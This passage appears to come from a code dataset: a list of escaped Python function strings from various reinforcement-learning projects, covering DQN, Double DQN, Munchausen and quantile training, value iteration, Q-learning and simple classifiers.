print(self.q_net.input_positions.shape)\n # print(nn_input.shape)\n # print(self.q_net.target_q.shape)\n # print(target_qs.shape)\n # print(self.q_net.actions.shape)\n # print(actions.shape)\n # print(type(nn_input))\n summary, _ = TFSN.get_session().run([self.q_net.merge, self.q_net.train_step],\n feed_dict={self.q_net.input_positions: np.asarray(nn_input).reshape(20,1,2,6),\n self.q_net.target_q: target_qs,\n self.q_net.actions: actions})\n self.random_move_prob *= self.random_move_decrease\n\n if self.writer is not None:\n self.writer.add_summary(summary, self.game_counter)\n summary = tf.Summary(value=[tf.Summary.Value(tag='Random_Move_Probability',\n simple_value=self.random_move_prob)])\n self.writer.add_summary(summary, self.game_counter)\n\n TFSN.get_session().run(self.graph_copy_op)", "def train(network_def, target_params, optimizer, states, actions, next_states, rewards,\n terminals, loss_weights, 
cumulative_gamma, target_opt, mse_inf,tau,alpha,clip_value_min, rng):\n online_params = optimizer.target\n def loss_fn(params, rng_input, target, loss_multipliers):\n def q_online(state):\n return network_def.apply(params, state, rng=rng_input)\n\n q_values = jax.vmap(q_online)(states).q_values\n q_values = jnp.squeeze(q_values)\n replay_chosen_q = jax.vmap(lambda x, y: x[y])(q_values, actions)\n \n if mse_inf:\n loss = jax.vmap(mse_loss)(target, replay_chosen_q)\n else:\n loss = jax.vmap(dqn_agent.huber_loss)(target, replay_chosen_q)\n\n mean_loss = jnp.mean(loss_multipliers * loss)\n return mean_loss, loss\n\n rng, rng2, rng3, rng4 = jax.random.split(rng, 4)\n\n def q_target(state):\n return network_def.apply(target_params, state, rng=rng2)\n\n def q_target_online(state):\n return network_def.apply(online_params, state, rng=rng4)\n\n if target_opt == 0:\n target = dqn_agent.target_q(q_target, next_states, rewards, terminals, cumulative_gamma) \n elif target_opt == 1:\n #Double DQN\n target = target_DDQN(q_target_online, q_target, next_states, rewards, terminals, cumulative_gamma)\n\n elif target_opt == 2:\n #Munchausen\n target = target_m_dqn(q_target_online, q_target, states,next_states,actions,rewards,terminals,\n cumulative_gamma,tau,alpha,clip_value_min)\n else:\n print('error')\n\n grad_fn = jax.value_and_grad(loss_fn, has_aux=True)\n (mean_loss, loss), grad = grad_fn(online_params, rng3, target, loss_weights)\n optimizer = optimizer.apply_gradient(grad)\n return optimizer, loss, mean_loss", "def evaluate(self):\n # initialize delta_weights\n Loss = 0\n for i, x_test in enumerate(self.X_test):\n Loss += (self.sigmoid(np.dot(self.weights,x_test))-self.y_test[i])**2\n return Loss", "def evaluate(self, state, epsilon=1e-6, reparam=False):\n\n action_probs = self.forward(state)\n action_pd = GumbelSoftmax(probs=action_probs, temperature=0.9)\n actions = action_pd.rsample() if reparam else action_pd.sample()\n log_probs = action_pd.log_prob(actions)\n return actions, log_probs, None, None, None", "def predict(self, state):\n if self.phase is None or self.device is None:\n raise AttributeError('Phase, device attributes have to be set!')\n if self.phase == 'train' and self.epsilon is None:\n raise AttributeError('Epsilon attribute has to be set in training phase')\n\n if self.reach_destination(state):\n return ActionXY(0, 0) if self.kinematics == 'holonomic' else ActionRot(0, 0)\n if self.action_space is None:\n self.build_action_space(state.robot_state.v_pref)\n\n probability = np.random.random()\n if self.phase == 'train' and probability < self.epsilon:\n max_action = self.action_space[np.random.choice(len(self.action_space))]\n else:\n max_action = None\n max_value = float('-inf')\n max_traj = None\n\n if self.do_action_clip:\n state_tensor = state.to_tensor(add_batch_size=True, device=self.device)\n action_space_clipped = self.action_clip(state_tensor, self.action_space, self.planning_width)\n else:\n action_space_clipped = self.action_space\n\n for action in action_space_clipped:\n state_tensor = state.to_tensor(add_batch_size=True, device=self.device)\n next_state = self.state_predictor(state_tensor, action)\n max_next_return, max_next_traj = self.V_planning(next_state, self.planning_depth, self.planning_width)\n reward_est = self.estimate_reward(state, action)\n value = reward_est + self.get_normalized_gamma() * max_next_return\n if value > max_value:\n max_value = value\n max_action = action\n max_traj = [(state_tensor, action, reward_est)] + max_next_traj\n if max_action is 
None:\n raise ValueError('Value network is not well trained.')\n\n if self.phase == 'train':\n self.last_state = self.transform(state)\n else:\n self.traj = max_traj\n\n return max_action", "def valueIteration(P,R,gamma,theta,initial_v,max_iter=1e8):\n print('Running value iteration ...')\n\n def one_step_lookahead(s, V):\n \"\"\"\n :param state: current state\n :param v: current value estimator\n :return: A, list of optimal action values under current value estimator\n \"\"\"\n num_a = num_actions\n num_S = num_states\n\n A = np.zeros(num_a)\n\n for a in range(num_a):\n for s_prime in range(num_S):\n A[a] += P[s, a, s_prime] * (R[s, a, s_prime] + gamma * V[s_prime])\n return A\n \n # initialization\n v = initial_v \n num_states, num_actions = P.shape[:2]\n k = 0 \n best_actions = [0] * num_states\n delta = 1000\n\n while delta > theta and k <= max_iter:\n delta = 0\n k += 1\n for s in range(num_states):\n action_values = one_step_lookahead(s, v)\n best_action_value = np.max(action_values)\n delta = max(delta, np.abs(best_action_value - v[s]))\n v[s] = best_action_value\n print(delta)\n\n for s in range(num_states):\n A = one_step_lookahead(s, v)\n best_actions[s] = np.argmax(A)\n\n\n print('number of iterations:', k)\n return best_actions, v", "def learn(self, batch_size, gamma, state_number, priority_scale=1.0):\n if self.use_per:\n (states, actions, rewards, new_states,\n terminal_flags), importance, indices = self.replay_buffer.get_minibatch(batch_size=self.batch_size,\n priority_scale=priority_scale)\n importance = importance ** (1 - self.calc_epsilon(state_number))\n else:\n states, actions, rewards, new_states, terminal_flags = self.replay_buffer.get_minibatch(\n batch_size=self.batch_size, priority_scale=priority_scale)\n\n # Target DQN estimates q-vals for new states\n result_ids = []\n for state in new_states:\n result_ids.append(self.target_dqn.predict.remote(np.expand_dims(state, axis=0)))\n\n results = ray.get(result_ids)\n target_future_v = np.amax(np.array(results).squeeze(), axis=1)\n\n # Calculate targets (bellman equation)\n target_q = rewards + (gamma * target_future_v * (1 - terminal_flags))\n\n # Use targets to calculate loss (and use loss to calculate gradients)\n with tf.GradientTape() as tape:\n trainable_variables = ray.get(self.dqn.trainable_variables.remote())\n tape.watch(trainable_variables)\n\n predict_ids = []\n for state in states:\n predict_ids.append(self.dqn.call.remote(np.expand_dims(state, axis=0)))\n\n q_values = tf.squeeze(tf.stack(ray.get(predict_ids)))\n\n one_hot_actions = tf.keras.utils.to_categorical(actions, self.n_actions,\n dtype=np.float32) # using tf.one_hot causes strange errors\n Q = tf.reduce_sum(tf.multiply(q_values, one_hot_actions), axis=1)\n\n error = Q - target_q\n loss = tf.keras.losses.Huber(delta=1.35)(target_q, Q)\n\n if self.use_per:\n # Multiply the loss by importance, so that the gradient is also scaled.\n # The importance scale reduces bias against situataions that are sampled\n # more frequently.\n loss = tf.reduce_mean(loss * importance)\n\n model_gradients = tape.gradient(loss, trainable_variables)\n self.dqn.apply_gradients.remote(model_gradients, trainable_variables)\n\n if self.use_per:\n self.replay_buffer.set_priorities(indices, error)\n\n return float(loss.numpy()), error", "def __call__(self, y_true: np.ndarray, y_pred: np.ndarray) -> float:", "def qlearning(env, iterations=1000, gamma=0.9, alpha=0.1):\n nS = env.nS # number of states\n nA = env.nA # number of actions\n Q_value = np.zeros((nS, nA))\n policy = 
np.ones((env.nS,env.nA))/env.nA\n epsilon = 1\n s_t1 = env.reset() # reset the environment and place the agent in the start square\n ############################\n # YOUR IMPLEMENTATION HERE #\n # HINT: Don't forget to decay epsilon according to GLIE\n\n curr_state = s_t1\n \n start = time.time() # to time how long convergence takes\n print(\"---Q Learning---\\nTraining Started.\")\n \n for k in range (1, iterations):\n # if (k%10000) == 0:\n # print(\"Now playing iteration: \", k)\n epsilon = 1/k\n curr_action, reward, new_state, done = take_one_step(env, policy, curr_state)\n new_action = sample_action(policy, new_state)\n Q_value[curr_state, curr_action] = Q_value[curr_state, curr_action] + alpha * (reward + gamma * (Q_value[new_state, np.argmax(Q_value[new_state])]) - Q_value[curr_state, curr_action])\n \n # epsilon-greedy policy update\n Q_list = np.argwhere(Q_value[curr_state] == np.amax(Q_value[curr_state])).flatten() # get a list of all indices where Q is maximum, (argmax(Q))\n max_Q = np.random.choice(Q_list.flatten()) # randomly pick from those indices. Picking each index is equally likely.\n for a in range (nA):\n if a == max_Q:\n policy[curr_state][a] = epsilon/nA + (1 - epsilon) # for the chosen maximal index of Q, set the policy to epsilon/m + 1 - epsilon\n else:\n policy[curr_state][a] = epsilon/nA \n \n # print(\"Q_value = {0}\".format(Q_value))\n # print(\"policy = {0}\".format(policy))\n \n if done:\n curr_state = env.reset() # reset the environment and place the agent in the start square\n curr_action = sample_action(policy, curr_state)\n else:\n curr_state = new_state\n curr_action = new_action\n \n stop = time.time()\n print(\"Training Completed.\")\n print(\"It took: {0} iterations and {1} minutes\".format(k,(stop-start)/60))\n \n ############################\n det_policy = np.argmax(Q_value, axis=1)\n return Q_value, det_policy", "def evaluate(self):\n RV = -self.predict()\n RV += self.Ystar()\n return RV", "def target_m_dqn(model, target_network, states, next_states, actions,rewards, terminals, \n cumulative_gamma,tau,alpha,clip_value_min):\n \n #----------------------------------------\n q_state_values = jax.vmap(target_network, in_axes=(0))(states).q_values\n q_state_values = jnp.squeeze(q_state_values)\n \n next_q_values = jax.vmap(target_network, in_axes=(0))(next_states).q_values\n next_q_values = jnp.squeeze(next_q_values)\n #----------------------------------------\n\n tau_log_pi_next = stable_scaled_log_softmax(next_q_values, tau, axis=1)\n pi_target = stable_softmax(next_q_values,tau, axis=1)\n replay_log_policy = stable_scaled_log_softmax(q_state_values, tau, axis=1)\n\n #----------------------------------------\n \n replay_next_qt_softmax = jnp.sum((next_q_values-tau_log_pi_next)*pi_target,axis=1)\n\n replay_action_one_hot = nn.one_hot(actions, q_state_values.shape[-1])\n tau_log_pi_a = jnp.sum(replay_log_policy * replay_action_one_hot, axis=1)\n\n #a_max=1\n tau_log_pi_a = jnp.clip(tau_log_pi_a, a_min=clip_value_min,a_max=1)\n\n munchausen_term = alpha * tau_log_pi_a\n modified_bellman = (rewards + munchausen_term +cumulative_gamma * replay_next_qt_softmax *\n (1. 
- jnp.float32(terminals)))\n \n return jax.lax.stop_gradient(modified_bellman)", "def jval(self):\n return self.q * self.model.nobs_moms", "def train_replay(self):\n\n if len(self.memory) < self.train_start:\n return\n\n if self.epsilon > self.epsilon_end:\n self.epsilon -= self.epsilon_decay_step\n\n mini_batch = random.sample(self.memory, self.batch_size)\n\n history = np.zeros((self.batch_size, self.state_size[0],\n self.state_size[1], self.state_size[2]))\n next_history = np.zeros((self.batch_size, self.state_size[0],\n self.state_size[1], self.state_size[2]))\n\n # Initialize the Value targets to optimize\n v_target = np.zeros((self.batch_size,))\n\n action, reward, dead = [], [], []\n\n for i in range(self.batch_size):\n history[i] = np.float32(mini_batch[i][0] / 255.)\n next_history[i] = np.float32(mini_batch[i][3] / 255.)\n action.append(mini_batch[i][1])\n reward.append(mini_batch[i][2])\n dead.append(mini_batch[i][4])\n\n # current state-action values Q(st, at)\n q_outputs = self.q_duelling_part.predict(history)\n\n # TD-values for updating the networks coming from the target model\n if self.target_model is True:\n v_target_value = self.target_v_duelling_part.predict(next_history)\n elif self.target_model is False:\n v_target_value = self.v_duelling_part.predict(next_history)\n\n q_targets = []\n\n for i in range(self.batch_size):\n if dead[i]:\n v_target[i] = reward[i]\n q_outputs[i][action[i]] = reward[i]\n\n else:\n v_target[i] = reward[i] + \\\n self.discount_factor * v_target_value[i]\n q_outputs[i][action[i]] = reward[i] + \\\n self.discount_factor * v_target_value[i]\n\n q_targets.append(q_outputs[i][action[i]])\n\n self.optimizer([history, action, q_targets]) # optimize the state-action-value head\n self.v_duelling_part.fit(history, v_target, epochs=1, verbose=0) # optimize the state-value head", "def _compute_q_argmax(self):\n self.cur_head = self._sess.run(self.ucb_net._P_argmax,\n {self.state_ph: self.state,\n self.ucb_A_ph: self.ucb_A,\n self.ucb_b_ph: self.ucb_b})[0]\n x = self._sess.run(self._net_outputs.q_heads,\n {self.state_ph: self.state})\n return np.argmax(x[:,:,self.cur_head], axis=1)[0]", "def learn(self):\r\n \r\n # take a mini-batch from replay experience\r\n cur_batch_size = min(len(self.replay_exp), self.batch_size)\r\n mini_batch = random.sample(self.replay_exp, cur_batch_size)\r\n \r\n # batch data\r\n sample_states = np.ndarray(shape = (cur_batch_size, self.state_size)) # replace 128 with cur_batch_size\r\n sample_actions = np.ndarray(shape = (cur_batch_size, 1))\r\n sample_rewards = np.ndarray(shape = (cur_batch_size, 1))\r\n sample_next_states = np.ndarray(shape = (cur_batch_size, self.state_size))\r\n sample_dones = np.ndarray(shape = (cur_batch_size, 1))\r\n\r\n temp=0\r\n for exp in mini_batch:\r\n sample_states[temp] = exp[0]\r\n sample_actions[temp] = exp[1]\r\n sample_rewards[temp] = exp[2]\r\n sample_next_states[temp] = exp[3]\r\n sample_dones[temp] = exp[4]\r\n temp += 1\r\n \r\n \r\n sample_qhat_next = self.brain_target.predict(sample_next_states)\r\n \r\n # set all Q values terminal states to 0\r\n sample_qhat_next = sample_qhat_next * (np.ones(shape = sample_dones.shape) - sample_dones)\r\n # choose max action for each state\r\n sample_qhat_next = np.max(sample_qhat_next, axis=1)\r\n \r\n sample_qhat = self.brain_policy.predict(sample_states)\r\n \r\n for i in range(cur_batch_size):\r\n a = sample_actions[i,0]\r\n sample_qhat[i,int(a)] = sample_rewards[i] + self.gamma * sample_qhat_next[i]\r\n \r\n q_target = sample_qhat\r\n \r\n 
self.brain_policy.fit(sample_states, q_target, epochs = 1, verbose = 0)\r\n \r\n \r\n \r\n \"\"\"\r\n \r\n for state, action, reward, next_state, done in mini_batch:\r\n target_Q_s_a = 0 # new target for Q(s,a)\r\n state = np.reshape(state, [1, state_size])\r\n next_state = np.reshape(next_state, [1, state_size])\r\n \r\n # if it is not the terminal state\r\n if not done:\r\n qhat_next = self.brain_target.predict(next_state) # estimate Q(s',a')\r\n target_Q_s_a = reward + self.gamma * np.amax(qhat_next[0]) # because the output is m * n, so we need to consider the dimension [0]\r\n else:\r\n target_Q_s_a = reward\r\n \r\n target_output = self.brain_policy.predict(state) # we will replace target of Q(s,a) for specific a later\r\n target_output[0][action] = target_Q_s_a # new target for state s and action a\r\n \r\n self.brain_policy.fit(state, target_output, epochs = 1, verbose = 0)\r\n \r\n \"\"\"", "def train(network_def, target_params, optimizer, states, actions, next_states, rewards,\n terminals, loss_weights, target_opt, num_tau_samples, num_tau_prime_samples,\n num_quantile_samples, cumulative_gamma, double_dqn, kappa, tau,alpha,clip_value_min, num_actions,rng):\n online_params = optimizer.target\n def loss_fn(params, rng_input, target_quantile_vals, loss_multipliers):\n def online(state):\n return network_def.apply(params, state, num_quantiles=num_tau_samples, rng=rng_input)\n\n model_output = jax.vmap(online)(states)\n quantile_values = model_output.quantile_values\n quantiles = model_output.quantiles\n chosen_action_quantile_values = jax.vmap(lambda x, y: x[:, y][:, None])(\n quantile_values, actions)\n # Shape of bellman_erors and huber_loss:\n # batch_size x num_tau_prime_samples x num_tau_samples x 1.\n bellman_errors = (target_quantile_vals[:, :, None, :] -\n chosen_action_quantile_values[:, None, :, :])\n # The huber loss (see Section 2.3 of the paper) is defined via two cases:\n # case_one: |bellman_errors| <= kappa\n # case_two: |bellman_errors| > kappa\n huber_loss_case_one = (\n (jnp.abs(bellman_errors) <= kappa).astype(jnp.float32) *\n 0.5 * bellman_errors ** 2)\n huber_loss_case_two = (\n (jnp.abs(bellman_errors) > kappa).astype(jnp.float32) *\n kappa * (jnp.abs(bellman_errors) - 0.5 * kappa))\n huber_loss = huber_loss_case_one + huber_loss_case_two\n # Tile by num_tau_prime_samples along a new dimension. 
Shape is now\n # batch_size x num_tau_prime_samples x num_tau_samples x 1.\n # These quantiles will be used for computation of the quantile huber loss\n # below (see section 2.3 of the paper).\n quantiles = jnp.tile(quantiles[:, None, :, :],\n [1, num_tau_prime_samples, 1, 1]).astype(jnp.float32)\n # Shape: batch_size x num_tau_prime_samples x num_tau_samples x 1.\n quantile_huber_loss = (jnp.abs(quantiles - jax.lax.stop_gradient(\n (bellman_errors < 0).astype(jnp.float32))) * huber_loss) / kappa\n # Sum over current quantile value (num_tau_samples) dimension,\n # average over target quantile value (num_tau_prime_samples) dimension.\n # Shape: batch_size x num_tau_prime_samples x 1.\n loss = jnp.sum(quantile_huber_loss, axis=2)\n loss = jnp.squeeze(jnp.mean(loss, axis=1), axis=-1)\n\n mean_loss = jnp.mean(loss_multipliers * loss)\n\n return mean_loss, loss\n\n grad_fn = jax.value_and_grad(loss_fn, has_aux=True)\n\n if target_opt == 0:\n rng, target_quantile_vals = target_quantile_values_fun(\n network_def,\n online_params,\n target_params,\n next_states,\n rewards,\n terminals,\n num_tau_prime_samples,\n num_quantile_samples,\n cumulative_gamma,\n double_dqn,\n rng)\n\n elif target_opt == 1:\n rng, target_quantile_vals = munchau_target_quantile_values_fun(\n network_def,\n online_params,\n target_params,\n states,\n actions,\n next_states,\n rewards,\n terminals,\n num_tau_prime_samples,\n num_quantile_samples,\n cumulative_gamma,\n double_dqn,\n rng,\n tau,\n alpha,\n clip_value_min,\n num_actions\n )\n\n else:\n print('error')\n\n rng, rng_input = jax.random.split(rng)\n (mean_loss, loss), grad = grad_fn(online_params, rng_input, target_quantile_vals, loss_weights)\n optimizer = optimizer.apply_gradient(grad)\n return rng, optimizer, loss, mean_loss", "def learn(self, state, action, reward, next_state):\r\n\r\n \"\"\"Please Fill Your Code Here.\r\n \"\"\"\r\n self.Q[state][action] = self.Q[state][action] + self.alpha * (reward + self.gamma * max(self.Q[next_state]) - self.Q[state][action])\r\n\r\n return 0", "def update_predict_network(self):\n states, actions, rewards, new_states, is_terminals = self.memory.sample(self.batch_size)\n\n preprocessed_states, preprocessed_new_states = self.preprocessor.process_batch(states, new_states)\n\n actions = self.preprocessor.process_action(actions)\n # update network\n q_values = self.cal_target_q_values(preprocessed_new_states)\n max_q_values = np.max(q_values, axis=1)\n max_q_values[is_terminals] = 0.0\n targets = rewards + self.gamma * max_q_values\n targets = np.expand_dims(targets, axis=1)\n\n self.q_network.train_on_batch([preprocessed_states, actions], targets)\n if self.num_steps % self.target_update_freq ==0:\n print(\"Update target network at %d steps\" % self.num_steps)\n self.update_target_network()", "def compute_td_loss(self, states, actions, rewards, next_states, is_done, gamma=0.99):\r\n actions = tf.convert_to_tensor(actions) # shape: [batch_size * seq_len]\r\n rewards = tf.convert_to_tensor(rewards) # shape: [batch_size * seq_len]\r\n is_done = tf.convert_to_tensor(is_done) # shape: [batch_size * seq_len]\r\n\r\n actions = tf.reshape(actions, [-1])\r\n rewards = tf.reshape(rewards, [-1])\r\n is_done = tf.reshape(is_done, [-1])\r\n states = tf.reshape(states, [batch_size * max_seq, 1, 4])\r\n next_states = tf.reshape(next_states, [batch_size * max_seq, 1, 4])\r\n # if self.USE_CUDA:\r\n # actions = actions.cuda()\r\n # rewards = rewards.cuda()\r\n # is_done = is_done.cuda()\r\n\r\n # get q-values for all actions in current 
states\r\n predicted_qvalues = self.DRQN.model.predict(states, steps=1)\r\n # predicted_qvalues = predicted_qvalues.reshape(-1, self.action_space.n)\r\n # predicted_qvalues = predicted_qvalues.squeeze(0)\r\n\r\n # select q-values for chosen actions\r\n # a = np.concatenate(actions)\r\n\r\n # predicted_qvalues_for_actions = predicted_qvalues[\r\n # range(states.shape[0]), actions\r\n # ]\r\n\r\n # compute q-values for all actions in next states\r\n predicted_next_qvalues = self.DRQN_target.model.predict(next_states, steps=1) # YOUR CODE\r\n # predicted_next_qvalues = predicted_next_qvalues.squeeze(0)\r\n predicted_next_qvalues = predicted_next_qvalues.reshape(-1, self.action_space.n)\r\n\r\n # compute V*(next_states) using predicted next q-values\r\n next_state_values = predicted_next_qvalues.max(-1)\r\n next_state_values_arg = predicted_next_qvalues.argmax(-1)\r\n # compute \"target q-values\" for loss - it's what's inside square parentheses in the above formula.\r\n target_qvalues_for_actions = rewards + gamma * next_state_values\r\n\r\n # at the last state we shall use simplified formula: Q(s,a) = r(s,a) since s' doesn't exist\r\n target_qvalues_for_actions = tf.where(\r\n is_done, rewards, target_qvalues_for_actions)\r\n # if is_done:\r\n # target_qvalues_for_actions = rewards\r\n # else:\r\n # target_qvalues_for_actions = target_qvalues_for_actions\r\n for i in range(len(target_qvalues_for_actions)):\r\n j = next_state_values_arg[i]\r\n predicted_qvalues[i][0][j] = target_qvalues_for_actions[i]\r\n # mean squared error loss to minimize\r\n loss = self.DRQN.train(states, predicted_qvalues)\r\n\r\n return loss", "def update(Q, target_Q, opt, samples, gamma=0.99, target_type='double_dqn'):\n xp = Q.xp\n obs = xp.asarray([sample[0] for sample in samples], dtype=np.float32)\n action = xp.asarray([sample[1] for sample in samples], dtype=np.int32)\n reward = xp.asarray([sample[2] for sample in samples], dtype=np.float32)\n done = xp.asarray([sample[3] for sample in samples], dtype=np.float32)\n obs_next = xp.asarray([sample[4] for sample in samples], dtype=np.float32)\n # Predicted values: Q(s,a)\n y = F.select_item(Q(obs), action)\n # Target values: r + gamma * max_b Q(s',b)\n with chainer.no_backprop_mode():\n if target_type == 'dqn':\n next_q = F.max(target_Q(obs_next), axis=1)\n elif target_type == 'double_dqn':\n next_q = F.select_item(target_Q(obs_next),\n F.argmax(Q(obs_next), axis=1))\n else:\n raise ValueError('Unsupported target_type: {}'.format(target_type))\n target = reward + gamma * (1 - done) * next_q\n loss = mean_clipped_loss(y, target)\n Q.cleargrads()\n loss.backward()\n opt.update()", "def _build_target_q_op(self):\n targets = []\n for gamma, target_q in zip(self.gammas,\n self._replay_next_target_net_outputs.q_values):\n # Get the maximum Q-value across the actions dimension.\n replay_next_qt_max = tf.reduce_max(target_q, 1)\n\n # Calculate the Bellman target value.\n # Q_t = R_t + \\gamma^N * Q'_t+1\n # where,\n # Q'_t+1 = \\argmax_a Q(S_t+1, a)\n # (or) 0 if S_t is a terminal state,\n # and\n # N is the update horizon (by default, N=1).\n cumulative_gamma = math.pow(gamma, self.update_horizon)\n n_step_reward = self._build_discounted_n_step_rewards(gamma)\n targets.append(n_step_reward + cumulative_gamma * replay_next_qt_max *\n (1. 
- tf.cast(self._replay.terminals, tf.float32)))\n return targets", "def get_action(self, history):\n history = np.float32(history / 255.0)\n if np.random.rand() <= self.epsilon:\n return random.randrange(3)\n\n else:\n q_values = self.q_duelling_part.predict(history)\n\n return np.argmax(q_values[0])", "def target_DDQN(model, target_network, next_states, rewards, terminals, cumulative_gamma):\n next_q_values = jax.vmap(model, in_axes=(0))(next_states).q_values\n next_q_values = jnp.squeeze(next_q_values)\n replay_next_qt_max = jnp.argmax(next_q_values, axis=1)\n next_q_state_values = jax.vmap(target_network, in_axes=(0))(next_states).q_values\n\n q_values = jnp.squeeze(next_q_state_values)\n replay_chosen_q = jax.vmap(lambda t, u: t[u])(q_values, replay_next_qt_max)\n \n return jax.lax.stop_gradient(rewards + cumulative_gamma * replay_chosen_q *\n (1. - terminals))", "def result(self):\r\n # TODO: how about xcurrent?\r\n return self.best.get() + (\r\n self.countevals, self.countiter, self.gp.pheno(self.mean), self.gp.scales * self.sigma * self.sigma_vec * self.dC**0.5)", "def _take_action(self, state):\n feed = {self.inputs_: state.reshape((1, *state.shape))}\n Qs = sess.run(self.output, feed_dict=feed)\n return np.argmax(Qs)", "def target_quantile_values(network, online_params, target_params, states,\n next_states, rewards, terminals,\n num_tau_prime_samples, num_quantile_samples,\n cumulative_gamma, double_dqn, rng):\n rng, rng1, rng2, rng3 = jax.random.split(rng, num=4)\n curr_state_representation = network.apply(\n target_params, states, num_quantiles=num_quantile_samples,\n rng=rng3).representation\n curr_state_representation = jnp.squeeze(curr_state_representation)\n rewards = jnp.tile(rewards, [num_tau_prime_samples])\n is_terminal_multiplier = 1. - terminals.astype(jnp.float32)\n # Incorporate terminal state to discount factor.\n gamma_with_terminal = cumulative_gamma * is_terminal_multiplier\n gamma_with_terminal = jnp.tile(gamma_with_terminal, [num_tau_prime_samples])\n # Compute Q-values which are used for action selection for the next states\n # in the replay buffer. 
Compute the argmax over the Q-values.\n if double_dqn:\n outputs_action = network.apply(online_params,\n next_states,\n num_quantiles=num_quantile_samples,\n rng=rng1)\n else:\n outputs_action = network.apply(target_params,\n next_states,\n num_quantiles=num_quantile_samples,\n rng=rng1)\n target_quantile_values_action = outputs_action.quantile_values\n target_q_values = jnp.squeeze(\n jnp.mean(target_quantile_values_action, axis=0))\n # Shape: batch_size.\n next_qt_argmax = jnp.argmax(target_q_values)\n # Get the indices of the maximium Q-value across the action dimension.\n # Shape of next_qt_argmax: (num_tau_prime_samples x batch_size).\n next_state_target_outputs = network.apply(\n target_params,\n next_states,\n num_quantiles=num_tau_prime_samples,\n rng=rng2)\n next_qt_argmax = jnp.tile(next_qt_argmax, [num_tau_prime_samples])\n target_quantile_vals = (\n jax.vmap(lambda x, y: x[y])(next_state_target_outputs.quantile_values,\n next_qt_argmax))\n target_quantile_vals = rewards + gamma_with_terminal * target_quantile_vals\n # We return with an extra dimension, which is expected by train.\n next_state_representation = next_state_target_outputs.representation\n next_state_representation = jnp.squeeze(next_state_representation)\n return (\n rng,\n jax.lax.stop_gradient(target_quantile_vals[:, None]),\n jax.lax.stop_gradient(curr_state_representation),\n jax.lax.stop_gradient(next_state_representation))", "def loss_function(self, q_vals, next_q_vals, rewards, actions, double_q_vals=None):\n with self.graph.as_default():\n with tf.name_scope('loss'):\n \"\"\"\n Calculate the target value(s)\n \"\"\"\n if double_q_vals is not None:\n # Select maximizing action using online network\n max_index = tf.argmax(double_q_vals, axis=1, output_type=tf.int32)\n indices = tf.stack([tf.range(0,self.batch_size), max_index], axis=-1)\n # Evaluate Q using target network\n next_q_acted = tf.gather_nd(next_q_vals, indices)\n else:\n # Select the maximum value of the next_q_vals: max_a Q(s_t+1,a)\n next_q_acted = tf.reduce_max(next_q_vals, axis=1)\n # y = r + gamma * max Q(s_t+1)\n target = tf.add_n([rewards, tf.scalar_mul(self.gamma, next_q_acted)], name='target_values')\n \"\"\"\n Retrieve the Q-value(s) of the given actions\n \"\"\"\n # Q(s_t,a_t)\n indices = tf.stack([tf.range(0,self.batch_size), actions], axis=-1)\n q_acted = tf.gather_nd(q_vals, indices)\n \"\"\"\n Calculate the loss: squared TD-error\n \"\"\"\n # This is the TD-error: y - Q(s_t,a_t)\n diff = tf.subtract(target, q_acted, name='TD_errors')\n # reduce-mean averages the negative and positive td-errors\n td_loss = tf.square(diff, name='squared_TD_errors')\n loss = tf.reduce_mean(td_loss)\n # Squared_TD_errors is the mean-squared-loss we want to minimize in training\n\n return loss, diff", "def obtain_training_parameters(para, x, y, alg = 'LR'):\n \n \n global omega\n \n # Iterate to find the optimal parameters\n if alg == 'LR': # logistic regression\n omega = np.zeros((3, 1))\n alpha = para.step_size # step size\n for i in range(para.iteration):\n grad = np.zeros((3, 1))\n for i in range(len(x[:, 0])):\n grad += np.reshape(x[i, :], (3, 1)) * (-y[i] + 1 / (1 + np.exp(-np.dot(x[i, :], omega))))\n omega -= alpha * grad \n \n elif alg == 'GNB': # Gaussian Naive Bayes\n # get counts for each class\n itszero = 0\n itsone = 0\n for i in range(len(y)):\n if y[i] == 1:\n itsone += 1\n else:\n itszero += 1\n \n # probability of see y\n theta0 = itszero / len(y)\n theta1 = 1 - theta0\n \n # mean of omega\n mew00 = 0\n mew01 = 0\n mew02 = 0\n mew10 = 
0\n mew11 = 0\n mew12 = 0\n for i in range(len(y)):\n if y[i] == 0:\n mew00 += x[i, 0] / itszero\n mew01 += x[i, 1] / itszero\n mew02 += x[i, 2] / itszero\n else:\n mew10 += x[i, 0] / itsone\n mew11 += x[i, 1] / itsone\n mew12 += x[i, 2] / itsone\n \n # variance of omega \n sigma00 = 0\n sigma01 = 0\n sigma02 = 0\n sigma10 = 0\n sigma11 = 0\n sigma12 = 0\n for i in range(len(y)):\n if y[i] == 0:\n sigma00 += (x[i, 0] - mew00)**2 / itszero\n sigma01 += (x[i, 1] - mew01)**2 / itszero\n sigma02 += (x[i, 2] - mew02)**2 / itszero\n else:\n sigma10 += (x[i, 0] - mew10)**2 / itsone\n sigma11 += (x[i, 1] - mew11)**2 / itsone\n sigma12 += (x[i, 2] - mew12)**2 / itsone\n \n # store these parameters into the name \"omage\"\n omega = [theta0, theta1, mew00, mew01, mew02, mew10, mew11, mew12,\n sigma00, sigma01, sigma02, sigma10, sigma11, sigma12] \n \n else: # Gaussian Mixture\n pass\n \n return omega", "def value_iteration(self):\n #Create a utility function of the environment shape\n gamma = 0.9\n epsilon = 0.01\n iteration = 0\n\n #create a utility function that matches the size of the number of states\n u = np.zeros(self.env.observation_space.n, dtype=float)\n\n u_copy = u.copy()\n\n #Create the reward grid\n reward = np.array([state_map.get(sublist) for state in frozen_lake.MAPS[self.env.spec._kwargs.get('map_name')] for sublist in state])\n\n T = self.frozen_transition()\n\n graph_list = list()\n\n #keep track of the convergence\n policy_convergence = list()\n\n while True:\n delta = 0\n iteration += 1\n u = u_copy.copy()\n graph_list.append(u)\n start_time = time()\n for s in range(self.env.observation_space.n):\n r = reward[s]\n v = np.zeros((1, self.env.observation_space.n), dtype=float)\n v[0, s] = 1.0\n u_copy[s] = self.return_state_utility(v, T, u, r, gamma)\n delta = max(delta, np.abs(u_copy[s] - u[s]))\n policy_convergence.append({'iter': iteration, 'delta': delta})\n if delta < epsilon * (1 - gamma) / gamma:\n print(\"Total Iterations: {}\".format(iteration))\n print(\"=================== VALUE ITERATION RESULT ==================\")\n print(\"Iterations: \" + str(iteration))\n print(\"Delta: \" + str(delta))\n print(\"Gamma: \" + str(gamma))\n print(\"Epsilon: \" + str(epsilon))\n print(\"Time to converge: {} seconds\".format(time() - start_time))\n print(\"===================================================\")\n utility_reshape = np.reshape(u, (int(np.sqrt(self.env.observation_space.n)), int(np.sqrt(self.env.observation_space.n))))\n print (np.array(utility_reshape, dtype=float))\n print(\"===================================================\")\n break\n\n return u", "def learn(self, experiences, 